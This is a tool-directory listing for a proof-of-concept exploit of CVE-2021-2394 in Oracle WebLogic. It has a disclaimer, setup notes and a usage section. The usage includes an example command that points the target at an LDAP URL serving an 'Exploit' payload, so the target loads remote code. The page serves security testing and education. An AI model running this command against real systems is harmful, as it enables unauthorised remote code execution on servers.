Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-2394 — POC of CVE-2021-2394 | Kitploit
Tools/GitHubGitHub/freeide/cve-2021-2394
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubfreeide/cve-2021-2394

CVE-2021-2394

POC of CVE-2021-2394

View Repository
20345 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-2394

POC of CVE-2021-2394

  • Disclaimer
    • This project is for educational use only. Any direct or indirect consequences and losses caused by unauthorized testing shall be borne solely by the user.
  • Notes

    • The POC uses IIOP to send packets. Please add the relevant dependencies (the 12.2.1.3.0 version dependencies have been placed in the release).
    • Use a lower version of JDK and install Weblogic for testing.
  • Usage:

    • Start an LDAP service
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • eg: java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • References:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
Download Tool